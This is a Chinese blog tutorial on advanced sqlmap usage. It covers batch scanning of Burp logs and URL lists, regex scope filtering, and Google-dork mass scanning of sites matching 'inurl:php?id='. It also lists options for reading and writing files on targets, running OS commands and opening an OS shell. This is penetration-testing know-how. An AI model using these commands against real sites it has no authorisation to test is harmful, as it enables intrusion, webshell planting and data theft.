sqlmap高级用法

最新推荐文章于 2024-05-15 22:19:08 发布
最新推荐文章于 2024-05-15 22:19:08 发布
阅读量2.5k 收藏 14
点赞数
分类专栏: 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/114882556
版权

一.批量化扫描burp的请求日志

1.打开burp配置项,进行如下修改
在这里插入图片描述
记录所有的request请求,保存在sqlmap目录下的sql.txt中
2.设置浏览器burp代理,访问测试url,查看sql.txt
在这里插入图片描述
3.sqlmap对sql.txt进行扫描
命令:sqlmap.py -l sql.txt --batch -smart
batch:会自动选择yes
smart:启发式快速判断,节约时间
在这里插入图片描述
结果将导出到C盘下的sqlmap目录下的output目录
在这里插入图片描述

二.批量扫描文本中的多个目标

1.在文本中写入要测试的url
在这里插入图片描述
2.sqlmap对url.txt进行扫描
命令:sqlmap.py -m url.txt --dbs
在这里插入图片描述

三.利用正则过滤目标网址

因为扫描burp请求时,有很多的请求我们不需要,并不是我们要扫描的网址,因此需要用正则去过滤
参数:–scope
例如:只想要www开头,.com/.net/.org结尾的网址
Python2 sqlmap.py -l burp.log --scope=”(www)?.target.(com|net|org)”

四.利用谷歌批量扫

命令:
sqlmap -g “inurl:php?id=10 site:.com.cn” --proxy “http://127.0.0.1:1080” --threads 5 --batch --answer “extending=N,follow=N,keep=N,exploit=n” --smart
-g #谷歌搜索
-proxy #代理(挂了ss就直接代理本地)
-threads #线程
-batch #自动回复
-answer “extending=N,follow=N,keep=N,exploit=n” #这个可以对一些特定的问题作出回答,在自动化注入中用
-smart #当有大量目标时,这个就只检查基于错误的注入点
例如:首先用谷歌搜索.php?id=1结尾的URL,然后进行注入测试
Sqlmap.py -g “inurl:\”.php?id=1\””

五.关于文件写入与shell获取

sql-shell #执行指定sql命令 (寻找文件绝对路径)
–sql-query #执行指定的sql语句
–file-read #读取指定文件
–file-write #写入本地文件
(–file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
–file-dest #要写入的文件绝对路径
–os-cmd=id #执行系统命令
–os-shell #系统交互shell
–reg-read #读取win系统注册表

参考链接:
https://cloud.tencent.com/developer/article/1076432

番茄酱料
关注
  • 0
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqlMap高级用法
魔都虫师的博客
08-19 560
一.介绍 开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。 检测方式:布尔盲注、时间盲注、报错注入、UNION联合查询注入、堆叠注入 支持数据库:Mysql、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb 二.基本参数 —update:更新 p
SQLMAP高级用法
你在看屏幕的同时,屏幕也在注视着你
12-19 2168
sqlmap高级用法
SQLMap进阶使用
Kali与编程
12-10 1060
在使用 SQLMap 插件时,我们需要了解 SQLMap 的基本使用方法,并掌握一些高级功能,如配置 SQLMap、使用 Payloads 和 Tamper Scripts、使用插件 API 等。其中一个最流行的工具是sqlmap,它是一个功能强大的自动化SQL注入工具,可以执行各种高级注入技术。在本文中,我将详细介绍sqlmap高级用法。可以通过该选项设置注入技术,包括B:布尔型盲注、E:错误型注入、U:基于联合查询的注入、S:基于堆栈的注入、T:基于时间的盲注、Q:基于双查询的注入、A:自动检测。
SQL注入之sqlmap使用教程(超详细)
最新发布
MateSnake的博客
05-15 875
SQL注入之sqlmap使用教程(超详细)
sqlmap高级技巧收集[轉載][收集整理]
07-02
sqlmap,高级sqlmap高级技巧收集[轉載][收集整理] 网络渗透必备
【SQL】- 高级用法
weixin_33834910的博客
02-23 238
2019独角兽企业重金招聘Python工程师标准>>> ...
sqlmap使用技巧总结
王骕的专栏
04-03 2497
1.sqlmap的get注入 假设目标是 http://www.baidu.com/news.php?id=1&data=2 sqlmap语句 列库 sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2"--dbs //假设结果显示库有3个: test1 、test2  、test3 获取库test1的表 sqlma
sqlmap-master
01-04
7. **自定义脚本**:SQLMap提供了自定义脚本功能,允许高级用户编写Python脚本来扩展其功能,满足特定需求。 在"sqlmap-master"这个压缩包中,我们可能看到的文件结构通常包括源代码文件、配置文件、文档、示例用法...
sqlmap自动扫描工具
06-14
- **高级用法**:可以指定参数、数据包、绕过WAF等,例如`python sqlmap.py -u "http://target.com/vulnerable_page.php?id=1" --data "id=1&submit=Submit" --technique T --level 5 --risk 3`,尝试更复杂和深入...
Sqlmap用法详解
12-02
本文将详细解读Sqlmap的基础用法高级技巧,包括如何利用Sqlmap进行GET和POST参数注入测试、处理Cookies中的注入、应对URL重写以及绕过WAF等技术细节。 #### 1. 基础用法介绍 - **列举数据库**:通过命令`./...
sqlmap工具
11-26
- 高级用法:可以通过`--technique`选择注入技术,`--level`调整检测强度,`--threads`设置并发线程数量,以及`--batch`无提示模式等。 4. 安全防范: - 输入验证:对用户输入进行严格的验证和过滤,避免恶意SQL...
sqlmap使用方法
weixin_50887021的博客
01-04 467
sqlmap使用方法 1.GET: sqlmap -u “” --dbs sqlmap -u “” -D “” --tables sqlmap -u “” -D “” -T “” --columns sqlmap -u “” -D “” -T “” -C “id,passwd” --dump 2.POST: sqlmap -r 3.txt --dbs --level=3 当前数据库:–current-dbs 3.txt 里面参数的部分要打* 3.高级用法sqlmap -r 3.txt --users -
sqlmap用法整理
shadow20112011的博客
02-10 991
关于sqlmap sqlmap是一款sql注入神器,是国外黑客大佬结合渗透测试经验的精华所著。软件有中文使用文档,现结合常用参数整理如下。 查看帮助文档 -h -hh 更详细的使用说明 使用随机user-agent请求头 --random-agent 使用特定的某一种或者几种注入手段,例如 时间盲注 --technique=T 指定注入参数 -p "id" 指定包含注入点的url -u "htt...
超详细SQLMap使用攻略及技巧分享
Y525698136的博客
12-26 1410
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
网络安全-sqlmap注意项及高级使用
关注网络安全、云原生安全
07-12 2110
注意项 ip隐藏 跑一些python脚本获取免费ip代理,或者购买稳定的ip代理 --proxy=http://112.84.54.169:9999 UserAgent隐藏 参数:-A="你的UserAgent" 或者--random-agent 高级使用
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
SqlMap进阶使用学习笔记
Y4tacker的博客
06-19 1万+
文章目录前提条件文件操作命令执行和msf的结合原理剖析 前提条件 网站必须是root权限 需要知道网站的绝对路径 GPC为off,php主动转义的功能关闭 My.ini secure_file_priv="" 文件操作 –file-read #读取指定文件 –file-write #写入本地文件 –file-dest #要写入的文件绝对路径 命令执行 –os-cmd=whoami #执行系统命令 –os-shell #系统交互shell 和msf的结合 –os-pwn
【SQL注入】Sqlmap使用指南(手把手保姆版)持续更新
记录并分享学习安全的知识点..
03-15 1500
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
03-13 2553
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值